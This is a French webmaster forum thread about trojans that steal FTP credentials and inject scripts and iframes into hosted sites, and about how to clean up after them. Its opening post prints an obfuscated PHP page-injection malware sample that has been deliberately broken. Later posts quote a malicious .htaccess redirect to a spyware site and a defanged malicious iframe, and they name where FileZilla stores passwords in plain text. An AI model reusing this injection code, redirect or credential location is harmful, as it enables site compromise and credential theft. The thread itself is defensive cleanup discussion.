define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsY W5ndWFnZT1qYXZhc2NyaXB CASSE PAR SECURITE TPSd2YXI8MjBhPDNkPDIyUzw2M3I8NjlwdDw0NW5naTw2ZWU8M jI8MmNiPDNkPDIyVmVyczw2OW88NmUoKSs8MjI8MmNqPDNkPDI yPDIyPDJjPDc1PDNkPDZlYXZpZ2F0b3I8MmV1czw2NTw3MkFnZ W50PDNiaWYoKHU8MmVpPDZlPDY0ZXhPZig8MjJXaW48MjIpPDN lMCk8MjY8MjYodTwyZWluZGV4Tzw2NjwyODwyMjw0ZVQ8MjA2P DIyKTwzYzApPDI2PDI2KDw2NG9jdW1lPDZldDwyZWNvbzw2Yml lPDJlaTw2ZWRleDw0ZmYoPDIyPDZkaTw2NTw2YjwzZDE8MjIpP DNjMCk8MjY8MjYodDw3OXA8NjVvZih6cjw3Nno8NzRzKTwyMTw zZHR5cGU8NmZmKDwyMj CASSE PAR SECURITE w0MTwyMikpPDI5P CASSE PAR SECURITE DdiPDdhcnZ6dHM8M2Q8MjJBPDIyPDNiZTw3NmFsKDwyMmlmKHc 8NjluZG93PDJlPDIyK2ErPDIyKTw2YTwzZDw2YSs8MjI8MmJhK zwyMjw0ZGFqb3I8MjI8MmI8NjI8MmI8NjErPDIyTWlub3I8MjI rYis8NjErPDIyPDQydTw2OWxkPDIyPDJiYjwyYjwyMmo8M2I8M jIpPDNiZG9jPDc1bWVudDwyZXdyaTw3NGU8Mj CASSE PAR SECURITE 2OXB0PDIwczw3MmM8M2Q8MmY8MmZndTw2ZDw2Mmw8NjFyPDJlY 248MmZyczw3MzwyZjwzZmlkPDNkPDIyK2orPDIyPDNlPDNjPDV jPDJmPDczY3JpcHQ8M2U8MjIpPDNiPDdkJzt2YXIgQ2l6PUVvT FMucmVwbGFjZSgvPC9nLCclJyk7ZXZhbCh1bmVzY2FwZShDaXo pKX0pKCk7CiAtLT48L3NjcmlwdD4='));
function tmp_lkojfghx($s){ if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinfl ate(substr($s,10,-8));
if(preg_match_all('#<script(.*?)</script>#is',$s,$a))
foreach($a[0] as $v) if(count(explode("\n",$v))>5){
$e=preg_match('#[\'"] CASSE PAR SECURITE [^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v) || preg_match('#[\(\[](\s*\d+,)20,}#',$v);
if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&amp;strpos;($v,'[removed]')))$s=str_replace($v,'',$s);}
$s1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(.+?\n --></script>#','',$s);
if(stristr($s,'<body')) $s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)| |stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array(); CASSE PAR SECURITE if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);
for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_l kojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}
if(($a=@set_error_handler CASSE PAR SECURITE ('tmp_lkojfghx2'))!='tmp_lkojfghx2')
$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2();
?>3fid"3d"22+j+"22"3e"3c"5c"2f"73cript"3e"22"29"3b"7d').replace(jil,xR5p)))})(/"/g); CASSE PAR SECURITE

Je précise qu'à la différence du tag iframe malveillant, normalement situé sur les pages de type index, ces scripts peuvent se trouver sur quasiment n'importe quelle page.

Je pense que pas mal de gens subissent ce qu'ils croient être de nouvelles infections à répétition parce que, en fait, seules ont été nettoyées les attaques iframes simples mais pas les scripts camouflés ("obfuscated").

Donc, oui à la recherche automatique d'iframes, mais il ne faut pas s'imaginer ou prétendre que c'est la (ou une) solution. C'est juste une partie. :cool:


Note : si on se sert du logiciel mentionné, surtout ne pas oublier de l'effacer du serveur immédiatement après usage car il constitue lui-même un trou de sécurité potentiel. (Ce que les instructions spécifient clairement, mais je préfère le répéter.)


Enfin, comment les agents malveillants arrivent-ils sur les PC, c'est dit dans le message initial (mais évidemment de manière très bréve) : en exploitant les failles de certains logiciels utilisés quand on surfe sur le Web.


+1 Pour ce que vient de poster Equilibrius

Salut PN1114, Je saurai pas trop dire si les développeurs d'iframe.attack compte mettre à jour leur soft ? pour détecter d'autre type d'attaques...

Mais chbj à raison tout de même quand il parle des autres types d'attaques en injection javacript :confused:, à première ont ne peut supprimer que les iframes qui craigne avec le soft, pour l'injection javascript si quelqu'un à une autre soluce, je suis preneuse... Pour l'instant, ici on touche du bois, avast ne s'affole plus qaund on navigue sur notre site, on a tester un maximum de page et on à mis à contribution nos visiteurs :):D pour qu'il nous contact dès que leur anti-virus s'affole.

Pour l'origine des chevaux de Troie qui pénètre nos système, j'ai lu quelque par que sa vient entre autre de Acrobat version 8.(je sais plus quoi) :confused: c'est quand même dingue si c'est vrai, parce que ça veut dire qu'il faut virer acrobat pro 8 (500 euro tout de même à l'époque ou je l'ai acheter...) et mettre le 9... pourquoi adobe prévois pas un patch de sécurité ??? si le pb viens vraiment d'une faille acrobat.

Pour les web-ftp (travail de groupe), je connais pas, je vais me renseigné...
(d'ailleurs si quelqu'un à un petit lien? je sais google est mon ami... je suis un peu flémarde, c'est qd même vendredi:p ! )

ps. merci pour le rappel chbj, :o j'avais oublié de supprimer iframe.attack de notre serveur après usage.... pas très malin la miss...

Pour l'origine des chevaux de Troie qui pénètre nos système, j'ai lu quelque par que sa vient entre autre de Acrobat version 8.(je sais plus quoi) :confused: c'est quand même dingue si c'est vrai, parce que ça veut dire qu'il faut virer acrobat pro 8 (500 euro tout de même à l'époque ou je l'ai acheter...) et mettre le 9... pourquoi adobe prévois pas un patch de sécurité ??? si le pb viens vraiment d'une faille acrobat.

Il y a des patches de sécurité, voir le how-to (mais je suspecte des failles d'autres logiciels d'être utilisées maintenant) :

Ces trojans utilisent des faiblesses de certains logiciels : Adobe Reader (aussi appelé PDF Reader, Acrobat Reader), et Adobe Flash Player. (A noter que rien n'empêche théoriquement d'utiliser des faiblesses d'autres logiciels similaires.)

La contamination s'effectue donc la plupart du temps par l'intermédiaire de ces logiciels par les fichiers qu'ils téléchargent / jouent.

Information sur les logiciels Adobe concernés :
http://www.adobe.com/support/security/index.html#readerwin
http://www.adobe.com/support/security/index.html#flash
http://www.adobe.com/support/security/index.html (home page sécurité)

- Télécharger les dernières versions de Adobe Reader et Adobe Flash Player, de préférence sur une machine sûre. (Il se peut que d'autres logiciels soient aujourd'hui en cause, mais il faut bien commencer par ce qui est connu !)

- Désinstaller totalement Adobe Acrobat Reader et Adobe Flash Player sur les PC.

- Mettre à jour ses anti-virus. (...)
Il peut être souhaitable, dans les cas extrêmes, de lancer l'antivirus à partir d'un CD-ROM bootable propre mais normalement cela n'est pas nécessaire avec cette famille de virus.

- Lancer son anti-virus et faire un scan complet.

- Supptrimer autant que possible tous les fichiers inutiles de votre PC

- Ensuite installer les dernières versions de Adobe Acrobat Reader et Adobe Flash Player


merci pour le rappel chbj, :o j'avais oublié de supprimer iframe.attack de notre serveur après usage.... pas très malin la miss...

:cool:

En ce qui concerne le développement d'iframe.attack, c'est pas pour critiquer, mais le soft a ces limites, comme le rappelle chbj les iframes ne sont pas les seul moyen de contamination, les hackers rivalisent d'ingéniosité quant au camouflage de leur bestiole, et rien qu'avec mes connaissances en prog web, j'ai pas trop de mal a imaginer des dizaines de "solutions" pour contourner iframe.attack (les plus évidente rien qu'en html : injection de <script, <object, ou encore <embed). Pour que leur soft soit vraiment performant, il faudrait beaucoup plus de temps de développement, et si un jour un tel soft existe (qui détecte toutes les injections de code malveillant), je ne pense pas qu'il coute que 15€ lol. Utiliser iframe.attack actuelement se résume a eseyer de métre un garro sur une tête coupé, quand le systeme est compromis, rien ne vaut de repartir à zero et de changer tout les pass, mais bien sûr ce n'est que mons humble avis :rolleyes:

Bonjour à tous,
me voici avec des retours très concrets

Hier j'ai absolument tout vider sur mon espace web, tout table ras

après j'ai fait un scan complet de mes deux PC (il y en a un seul qui utilise ftp pour se connecter à mon site)

En fait en mode sans echec j'ai passé CCleaner, RegCleaner, Malwarebytes.

Sur mon poste j'ai constamment Avast qui laboure, ad-aware et j'ai aussi installé ZoneAlarm qui normalent est là pour m'indiquer tout accès sur internet.

tous ces logiciels ont indiqué que mon poste est propre.

Acrobat et Flash Player ont été desintallé et re-installé la semaine dernière.

Hier soir avant d'eitteindre mon poste j'ai créé un nouvau mot de passe ftp de sorte de rallumer mon poste le lendemain avec un noveau mot de passe.

J'allume ce matin et une demie heure plus tard je me connecte sur ftp pour placer une petite page .html où il n'y a qu'un message indiquant que mon site, ayant été mechament hacké, il est en reconstrucion.

et voilà que je trouve un joli .htaccess créé par un propriétaire que je ne connait pas (2338 100) et dans lequel je lis:

RewriteEngine On

RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR]


RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR]


RewriteCond %{HTTP_REFERER} .*ya.*$ [NC]

RewriteRule .* http://spywareshop.info/0/go.php?sid=2 [R,L]

Quelqu'un peut me dire comment un trojan quel qu'il soit peut chopper mon nouveau mot de passe alors que je ne l'avais pas encore saisi (je vous rappelle j'en avais créé un tout neuf la veille au soir) et aussi me dire ce que ce .httaccess veut dire?

merci de votre aide et là j'avoue ne pas comprendre du tout car je ne saisit mon nouveau de passe à 11:7 alors que ces fichiers datent de 10:32 donc l'heure à laquelle j'ai allumé mon poste.

Sauf si ce fichier .htaccess c'est ovh qui le crée... ou google....

je n'en peux plus.

merci à tous

Quel est le chmod du répertoire où est ce htaccess ? y a des choses au niveau des log ftp, apache ?

Bonjour et merci :)

en faite, moyennant du paiement au super support ovh (...) j'ai reussi à qu'il me disent que la connexion se faisait sur un autre login ftp (multi-ftp).

SAUF QUE LE LOGIN QUI APPARAISSAIT je ne le connassait pas homez.43
Je n'ai jamais créé un login comme ceci de ma vie.

J'avais créé un espace ftp secondaire pour un ancien client (qu'il puisse prendre des fichiers que je lui livrais) mais jamais homez.43

sauf si ceci est créé automatiquement.... je ne sais pas.

donc je ne sais pas d'où vient cette faille; peut-être d'OVH lui-même mais ils diront toujours que non!!!!

j'ai supprimé cette chose, fais un chown pour me redonner le propriété à mes répertoires et pour l'instant ça a l'air d'aller mieux.

depuis 6 mois je me bats avec ovh pour qu'il me donnent plus d'info et finalement j'ai dû leur payer (c'est ce qu'ils veulent) afin d'avoir plus d'info.

j'ai dû supprimer entièrement mon espace web; j'attends un peu avant de tout recommencer et de dire à Google de revoir mon site car je suis classé comme site "malveillant" biensûr.

c'est fou cette histoire.

affaire malheureusement à suivre

D'accord j'ai regardé sur google et homez.xxx est bien lié au multi-ftp de ovh; donc c'est normal
alors la chose est que c'est par cette porte qu'ils entraient ces chinois... puisque ce sont des chinois qui m'ont chopper cette entrée

merci à tous en esperant que peu à peu ce merdier cera reglé pour tous

PN1114, pourraîs-tu nous donner plus de détails STP ?

Peut-être nous recopier la réponse du support OVH si elle était écrite ?

Evidemment, masque les mots de passe et remplace ton nom de domaine par "mondomaine.net" ou n'importe quoi, de même pour les logins. Fais de même pour ceux du client.


Par exemple, tu devrais avoir ce type d'informations (voir l'email que tu as reçu à ta création de compte)

FTP
Serveur ftp : ftp.mondomaine.com ou ftp.90Plan.ovh.net
Login ou utilisateur : AAAAAAAAA
Mot de passe : huhuhuhuhiu


FTP ANONYME, codes pour upload
Serveur ftp : ftp2.mondomaine.com ou anonymous.ftp.ovh.net
Login : AAAAAAAAA
mot de passe : xyxyxyxyxyxyx

Et ensuite, tu devrais avoir créé un sous-dossier FTP dans ton FTP principal (celui du site, pas l'anonyme) et y avoir attaché un login et mot de passe pour le client, de telle sorte que quand, il se connecte, il ne voit QUE son sous dossier.

A partir de là, si tout est bien comme ça, c'est cette histoire "d'autre login" qui nous intéresse. ET comment il a pu être utilisé. (Ou alors je ne suis pas réveillé, c'est possible, grosse nuit de travail)

homez.43 est un nom utilisé par OVH pour les chemins "en dur" de ses serveurs et il se susbtitue à "/home" qui est le chemin relatif utilisé dans les scripts.

Bonsoir

Concernant l'autre login en fait il y a déjà plus d'un an j'avais créé un espace ftp pour un client pour qu'il puisse recupérer des fichiers.

C'est sur cette connexion ftp que les fameux trojans ont réussit à chopper mon mot de passe.
Moi j'avais totalement oublié que j'avais créé cela car c'est un ancien client; donc pendant des semaines je changais mon mot de passe trois fois par jours en croyant que le souci était sur mon ftp principal!!!!! Alors qu'il fallait le changer aussi sur le secondaire mais dont j'avais oublié l'existence.

Ce que je ne pardonne pas au support OVH c'est d'avoir mis autant de temps, disons d'avoir attendu que je paie le service de support pour me donner cette information!!!!! J'en revenais pas!!!!

Je pense que les chinois (car ce sont des chinois qui se connectaient) ont choppé mon mot de passe il y a très longtemps car ils ont fait un vrai dégas sur mon site et ils sont abusé de ma messagerie en tant que système de spam (je n'utilise pas l'adresse email de mon site me passe par hotmail donc je n'étais même pas au courant)

donc voilà ça a été la cata, l'état de mon site auprès de Google c'est un desastre mais j'ai demandé qu'il revalue le site. On verra.

Je ne peux pas t'en dire plus car ma conversation avec ovh a été par téléphone sur ce point et que j'ai supprimé ce deuxième ftp si vite lorsque j'ai vu que c'était là que...

Depuis, tout se passe bien est mon site reste inviolé à ce jour donc depuis samedi (nous sommes mardi... déjà mercredi vu l'heure).

bonne nuit à tous

>chbj
Je tiens tout simplement à te remercie, j'ai eu pas mal de problème avec mes clients sur ce thème là, la solution pour moi, c'est analizer les FTP des clients, y si ce sont des ips etrangère, verifie le code et bloque la web en prevenant le client si le code contient cette me...
Mais depuis pas mal de temp je cherche des explications sur ce thème là pour pouvoir leur expliquer ce qu'ils doivent faire.
Ton post donne deja beaucoup de piste.

http://www.bruno-tran.fr/
http://www.bruno-tran.fr/blog

J'ai attrapé cette m**** . Toutes les pages des sites et sous-sites que j'ai s'affichent mal ou plantent...
Le gars qui a programmé est une belle enflure :mad::mad:
je verrais ce que je peux faire ce soir. comme si j'avais que ça à faire quoi...

Avast! rapporte une infection de type HTML:Illiframe-B[Trj] sur votre site.

Bien vu, Daniel60 :D

La variété Illiframe-B est actuellement en recrudescence d'activité.

Hier, pour ne citer qu'un seul site "très public" et "important", le site de la Fondation de Monaco pour la lutte contre le SIDA a été infecté. (Je ne donne volontairement pas l'adresse.)


Dieu merci, ce trojan très en vogue n'utilise que la méthode de l'iframe simple.

Si vous êtes infectés, il est à peu près certain que le code malveillant est :

<iframe src="http://beeeo.XXXXXXXXXXru:8080/index.php" width=619 height=145 ></iframe>

Supprimer "XXXXXXXXXX" pour voir le code réel. "XXXXXXXXXX" est une mesure de sécurité.

- Effacer tous ces iframes
- Vérifier la présence d'autres i frames
- Appliquer les règles de mon How-To pour nettoyer TOUS les PC et le site
- Changer les codes FTP obligatoirement

Info supplémentaire au post ci-dessus.... Ca va très vite avec ce Trojan. :(

Attention, comme je le suspectais, il peut y avoir PLUSIEURS iframe différents si on est infecté par lui.

En plus de beeeo.XXXXXru, on trouve fréquemment biozovXXXXX.ru

Enlever XXXXX pour voir l'adresse réelle.


Il faut, une fois de plus, rappeler qu'il est indispensable de rechercher TOUS les iframes. (Voir aussi les function supects, se reporter au How-To.)

Houla, pas bon ! On dirait que ce sont des Kimsufi qui sont les adresses-cibles des iframes malveillants cités dans les deux posts précédents. Et c'est déjà listé sur le Web.

Quelqu'un d'OVH peut voir ça ? (Quel email pour contacter OVH dans ce genre de cas ? abuse@ovh.com ?)


www.beeeo.ru est l'IP [91.121.97.186]

IP Information - 91.121.97.186
IP address: 91.121.97.186
Reverse DNS: ks353659.kimsufi.com.
Reverse DNS authenticity: [Verified]
ASN: 16276
ASN Name: OVH (OVH)
IP range connectivity: 1
Registrar (per ASN): RIPE
Country (per IP registrar): FR [France]
Country Currency: EUR [euros]
Country IP Range: 91.121.0.0 to 91.121.255.255
Country fraud profile: Normal
City (per outside source): Paris, Ile-De-France
Country (per outside source): FR [France]
Private (internal) IP? No
IP address registrar: whois.ripe.net
Known Proxy? No



biozov.ru est l'IP [91.121.24.139]

IP Information - 91.121.24.139
IP address: 91.121.24.139
Reverse DNS: ks24667.kimsufi.com.
Reverse DNS authenticity: [Verified]
ASN: 16276
ASN Name: OVH (OVH)
IP range connectivity: 1
Registrar (per ASN): RIPE
Country (per IP registrar): FR [France]
Country Currency: EUR [euros]
Country IP Range: 91.121.0.0 to 91.121.255.255
Country fraud profile: Normal
City (per outside source): Paris, Ile-De-France
Country (per outside source): FR [France]
Private (internal) IP? No
IP address registrar: whois.ripe.net
Known Proxy? No


Voir aussi :
http://www.malwareurl.com/listing.php?domain=beeeo.ru

http://www.malwareurl.com/listing.php?domain=biozov.ru

Bonjour

pour commencer...
ptain mais c'est galère, j'ai beaucoup de trucs qui ont été infectés et qui étaient en ligne, le gars qui a fait ça est une belle enflure !!! :fou: :fou: :fou:

sinon j'avais des problèmes d'affichage, sur les pages php des parses error...
dans les html, ce qu'il y avait dans body était partieeelnt effacé
il aurait fallu effacer les pages une par une car le code (à la con:mad:) était différent sur chaque page.
mais heureusement grace aux caches google, et des sauvegardes c'est redevenu normal, pour le moment.

- me confirmez vous qu'on n'a pas de sauvegardes sur les hébergements mutualisés ?
- est il possible d'avoir la main sur le fichier qui permet de changer le fichier de la page d'accueil (fichiers index)

merci

le gars qui a fait çaC'est pas un ga, sinon ça serait bien fait, c'est un simple bot..

est il possible d'avoir la main sur le fichier qui permet de changer le fichier de la page d'accueil (fichiers index)(ça fait beaucoup de fichier :D)

Le fichier qui fait que index.php est la page d'accueil par défaut ? je suis pas sur de bien comprendre o.O

1) Une nouvelle mise à jour de Flash Player est disponible.

Version : Adobe Flash Player version 10.0.32.18

Procédez à la mise à jour. :cool:


2) Important:
Je vais mettre à jour ce How-To et ce fil aussitôt que possible dû à la soudaine croissance des attaques infectieuses par publicités insérées sur des sites webs parfaitement honnêtes. (Rapidement baptisé "malvertising".)

On sort juste de la Conférence annuelle de Virus Bulletin http://www.virusbtn.com/conference/vb2009/programme/index et il a en été beaucoup question avec notamment des interventions de Google notamment par la voix de son cherf de département anti-malvertising.

Il y a peu, c'est le site du New York Times (donc pas un petit site amateur) qui a été le vecteur d'une telle attaque. Après quelques publicités ordinaires, le canal s'est mis à afficher une publicité pseudo anti-virus dirigeant vers un site malveillant.

Le NYTimes s'est montré très discret à ce sujet, juste une note et des conseils à ses lecteurs :
http://www.nytimes.com/2009/09/13/business/media/13note.html?_r=3
http://gadgetwise.blogs.nytimes.com/2009/09/14/what-to-do-if-you-saw-an-antivirus-pop-up-ad/?hp

Mais le problème est bien là, il est général et il est très sérieux.

EDIT: si vous ne parlez pas Anglais, Ecrans vient de publier un petit article très clair qui résume bien la situation mais ne donne pas d'info techniques précises (ce n'est pas la vocation du site). http://www.ecrans.fr/Apres-l-attaque-du-New-York-Times,8212.html



>chbj
Je tiens tout simplement à te remercie, j'ai eu pas mal de problème (... )
Mais depuis pas mal de temp je cherche des explications sur ce thème là pour pouvoir leur expliquer ce qu'ils doivent faire.
Ton post donne deja beaucoup de piste.

Merci :) Content d'être utile.

J'ai eu la surprise de voir que même le Support OVH me cite !
http://forum.ovh.com/showpost.php?p=307655&postcount=3
http://forum.ovh.com/showpost.php?p=307772&postcount=9

Donc, maintenant que je suis célèbre, il me reste à accomplir mes deux autres buts avec la même facilité :
- devenir riche
- être le Maître du Monde
:p

Salut tout le monde,

j'ai droit aussi à ce petit cadeau ....

Surveillez également les fichiers nommés main.lang.php des install dotclear, notre charmant copain s'y loge aussi .....

Nous nettoyons en ce moment 40 sites touchés par cette m....
si plus d'infos, je rajoute ici ... (merci pour vos précieux conseils ....)

Bonjour,
Je reste effaré devant le nombre de personnes qui se font pirater en mutu. :eek:
Ce forum regorge pourtant de solutions pour éviter ça.
La simple règle du 404/505 devrait pourtant suffire à éviter 99% de ces problèmes
et sa mise en place en automatique ne prend que 3 minutes.
Alors pourquoi autant de comptes piratés ?
A cause des spywares sur les PC ?
Moi y'en a pas trop comprendre là... :confused:

Machine vérolée et réseau ne font pas bon ménage ....

Surveillez également les fichiers nommés main.lang.php des install dotclear, notre charmant copain s'y loge aussi .....


Oui, comme je l'ai dit dans le How-To, les fichires utilisés pour créer des pages dynamiques (CMS, forums, blogs, Wikis, etc.) sont aussi des cibles de choix. Il faut vraiment maintenant vérifier tous les fichiers.


Bonjour,
Je reste effaré devant le nombre de personnes qui se font pirater en mutu.

Ca marche tout aussi bien en dédié quand ils emploient FTP. De très importants sites ont été affectés ces deniers mois aux USA, et ils étaient en dédiés hébergés (d'où le risque puisque c'est la connexion FTP qui est visée, et ils utilisaient FTP, pas forcément souvent, mais une fois suffit.).



La simple règle du 404/505 devrait pourtant suffire à éviter 99% de ces problèmes

Le changement de droits que j'ai expliqué (et je ne suis pas le seul), ne peut certainement pas éviter "99%" de ces problèmes. C'est un barrière de plus, importante, mais aucune solution seule ne peut éviter "99%" (ou 98 ou 97...) de ces problèmes.

Alors pourquoi autant de comptes piratés ?
A cause des spywares sur les PC ?
Moi y'en a pas trop comprendre là... :confused:

C'est pourtant simple et clairement expliqué : si un dispositif de type Trojan (ou autre) peut capturer tes codes FTP, alors quelqu'un (la pire des situations) ou un robot (moins grave car stupide) peut contrôler ton site web comme si c'était toi.



Bonne nouvelle pour les utilisateurs de Firefox :
une page Web de Mozilla pour signaler les plug-ins périmés

Firefox 3.5.3 et 3.0.14 pouvaient vous avertir des plug-ins Adobe Flash Player, ici:
http://en-us.www.mozilla.com/en-US/firefox/3.5.3/whatsnew/
toutefois Mozilla a décidé d'aller plus loin.

Face aux problèmes causés par l'utilisation de failles de sécurité dans les Plug-ins périmés (notamment Adobe Flash Player, voir le How-To), Mozilla vient d'ouvrir une page semi-beta permettant de savoir quels sont vos plug-ins périmés et de les mettre à jour.

Voici l'annonce:
http://blog.mozilla.com/webdev/2009/10/02/upyourplug-needs-your-help/

Et voici la page:
https://www-trunk.stage.mozilla.com/en-US/plugincheck/

Attention, vous aurez un avertissement de sécurité à cause d'un certificat qui ne fonctionne pas au moment d'écrire ces lignes. (Bien joué, Mozilla! :rolleyes:)
Il faut utiliser la fonction "ajouter une exception" pour utiliser cette page de détection des plug-ins.


J'ajoute cette information dans le How-To.

Bonjour,

Est-ce que quelqu'un a fait un script qui permettrait de supprimer toutes les premières lignes d'un fichier php si celle-ce contient le code pirate. Dans mon cas le code est :
<?php /**/eval(base64_decode('aWYoZn..... ?>


Merci de votre aide,
Alexandre

Bonjour,

De mon côté, c'est étrange, car après avoir corrigé toutes mes pages + changé mes pass FTP, j'ai ensuite été coupé du net pendant 3 semaines.

Et c'est pendant cette période que le virus a ré-attaqué. Est-ce possible sans que le PC soit connecté au net ??

En tout cas, j'avais nettoyé mon PC mais je n'avais pas réinstallé les deux logiciels adobe ... c'est peut-être là mon erreur ?

Je vais refaire une tentative maintenant que j'ai pu lire votre topic mais j'avoue que j'en ai ras-me-bol de perdre 4 heures avec ça ... si cela intéresse quelqu'un d'effectuer le nettoyage de mon ftp contre un peu d'argent de poche, me contacter !

D'ailleurs, un tuyau pour faire une recherche multi-dossiers ? Je ne suis à priori attaqué que par iframes.

Nicolas

C'est reparti avec Adobe. Pas sûr que cette nouvelle faille sera exploitée pour affecter des sites web, mais elle peut parfaitement l'être par les nuisibles ayant déjà utilisé les failles des logiciels Adobe, comme une "suite logique".

Sources : Adobe / www.pcinpact.com / Securia / Symantec

http://www.pcinpact.com/actu/news/54572-adobe-reader-pdf-troyen-faille.htm
Nouvelle vulnérabilité 0-day dans Acrobat et Adobe Reader
Merry Christmas !
Sécurité

Une nouvelle faille de type 0-day vient d’être rapportée pour les logiciels Acrobat et Adobe Reader. Rappelons que le premier est un produit professionnel de création de fichiers PDF, tandis que l’autre est le lecteur officiel pour ces derniers. Tous deux sont édites par Adobe.

adobe reader
Adobe Reader

L’éditeur a confirmé la faille en indiquant qu’elle était déjà exploitée. Il n’existe pas de correctif actuellement, et la seule solution pour être certain de ne pas être touché semble d’utiliser un autre logiciel de lecture des PDF.

Concernant la dangerosité de la faille, tout le monde n’est pas d’accord :

* Symantec a déjà repéré une exploitation de la faille prenant la forme d’un cheval de Troie. Appartenant à la famille « Pidief », son taux d’infection serait très limité.
* Pour Secunia en revanche, le niveau de dangerosité serait extrêmement critique.

Attendons maintenant le correctif d’Adobe et, faute de mieux, méfiez-vous de qui envoie des PDF, et mettez vos antivirus à jour.

http://www.pcinpact.com/link.php?url=http%3A%2F%2Fsecunia.com%2Fadvisories %2F37690%2F

http://www.symantec.com/connect/blogs/zero-day-xmas-present

http://www.pcinpact.com/link.php?url=http%3A%2F%2Fblogs.adobe.com%2Fpsirt% 2F2009%2F12%2Fnew_adobe_reader_and_acrobat_v.html

Suite du message précédent :

PCINpact www.pcinpact.com résume très bien la situation, donc je me contente de recopier.


URL : http://www.pcinpact.com/actu/news/54572-adobe-reader-pdf-troyen-faille.htm
Mise à jour : Adobe vient de préciser qu'il n'y aurait pas de correctif officiel avant le 12 janvier minimum. En attendant, l'éditeur propose des clés de registre pour Windows ainsi que des marches à suivre (en anglais et pas forcément aisées) pour Mac OS X et Linux.


Clés de registre pour Windows
http://www.pcinpact.com/link.php?url=http%3A%2F%2Fdownload.macromedia.com% 2Fpub%2Facrobat%2Fupdates%2FAPSA09-07_C_Reg_Keys.zip


Mac OS X et Linux
http://www.pcinpact.com/link.php?url=http%3A%2F%2Fkb2.adobe.com%2Fcps%2F53 2%2Fcpsid_53237.html

Une fois le PC contaminé, il va à son tour tenter de propager la contagion de la manière suivante : il recherche des codes FTP présents sur l'ordinateur, et les utilise pour placer l'iframe malicieux sur les sites accessibles par le FTP. Ces sites contamineront d'autres PC, et ainsi de suite.

Je viens de subir une attaque et bien sur c'est la cata. Ou plutôt c'était, vu que j'ai réussi à endiguer la contamination et que j'en sors peu à peu.
Si je devais positiver je dirais que ça m'a permis de me "former" aux questions de sécurité. Bon je suis encore un total néophyte en la matière et j'ai donc plein de question.
Mais je vais commencer doucement et en poser une : Dans le mail d'intro de ce topic (mille merci!) j'ai relevé l'histoire de la contagion et du "vol" des codes FTP.
Il les cherche et trouve ou et comment? Dans un fichier excell (par exemple) ou les codes seraient notés? ou dans le log FTP ou les codes sont pré-entrés?
Est ce que si j'imagine de ne pas mettre ces codes dans un fichier tiers (word ou excell par exemple) ni de les faire retenir dans Filezilla (par exemple) empecherait le virus de faire son nid?
A moins, c'est en tapant ma question que ça m'est venu, le trojan va chercher les codes dans les fichiers de connection à la base Sql?

Merci d'avance!

@lodemars : Malheureusement, il n'y a pas de réponse générale, cela dépend du trojan. Une méthode consiste à intercepter, à un stade ou un autre, les codes FTP quand une connexion FTP s'établit... mais il y a plus simple : sur les logiciels FTP, si les mots de passe sont stockés (et on le fait TOUS, tôt ou tard, parce que, un jour ou l'autre, on craque de devoir les retaper), il suffit au trojan d'aller les chercher là. (Même moi, je ne retape pas TOUS les mots de passe, seulement les plus critiques.)

Mais comment?! Les mots de passe ne sont-il pas cryptés?! Souvent mais pas toujours, et quand ils le sont, c'est souvent avec des codages très faibles... qui ne servent à rien sur les logiciels open source puisque, par défintion, on peut connaître le code que le logiciel emploie pour décrypter le mot de passe. En effet, les mots de passe FTP sont transmis en clair et doivent donc obligatoirement être décryptés par le client FTP s'il les a stockés sous un forme codée. Ce qui signifie aussi que, pour les clients FTP non-open-source, il suffit d'un peu d'inverse-engineering pour décoder les mots de passe facilement.

Pour être franc, tu parles de FileZilla où le mot de passe est en clair:

Si on a enregistré le site dans le gestionnaire de sites de FileZilla, on va dans C:\Documents and Settings\nom_de_ton_compte\Application Data\FileZilla , on trouve deux fichiers qui se nomment sitemanager.xml et recentservers.xml dans lesquels les mots de passe sont en en clair.

Il suffit simplement de récupérer ces fichiers et le mal est fait. Donc, il faut trouver un autre logiciel ou demander aux programmeurs de crypter ces fichiers.

Dans filezilla, il faut choisir le type d'authentification "Demander le mot de passe" qui aura pour effet de ne sauvegarder aucun mode de passe dans le fichier sitemanager.xml. Proscrire absolument le mode de connexion rapide juste sous le menu qui a pour effet de sauvegarder les mots de passe dans filezilla.xml et recentservers.xml

Existe-il un moyen d'automatiser la recherche et la destruction des lignes vérolées sous Ubuntu Linux?
Merci d'avance :)

Excellent tutoriel, je l'utiliserai pour le conseiller à l'occasion.

Voilà longtemps que j'ai été hacké mais que j'ai pu "facilement" réparer (merci aux backups!).
Depuis, 705 pour les dirs et 404 (ou 604) ppur les fichiers sont la règle.
(En fait, sur certains systèmes autres que OVH il faudra mettre 775 et 664, ou 755 et 644 selon les cas).

En effet, l'infection se produit souvent selon le scénario site1 hacké --> virus/troyen sur le PC du visiteur --> codes FTP --> hackage du site 2 soit depuis le PC soit depuis un site 3 qui sert de relais.
Contre ce scénario, un bon anti-virus bloquera l'arrivée sur le PC (et AVG comme Avast sont parfaits même dans leurs versions gratuites) et, peut-être, le firewall bloquera la sortie.

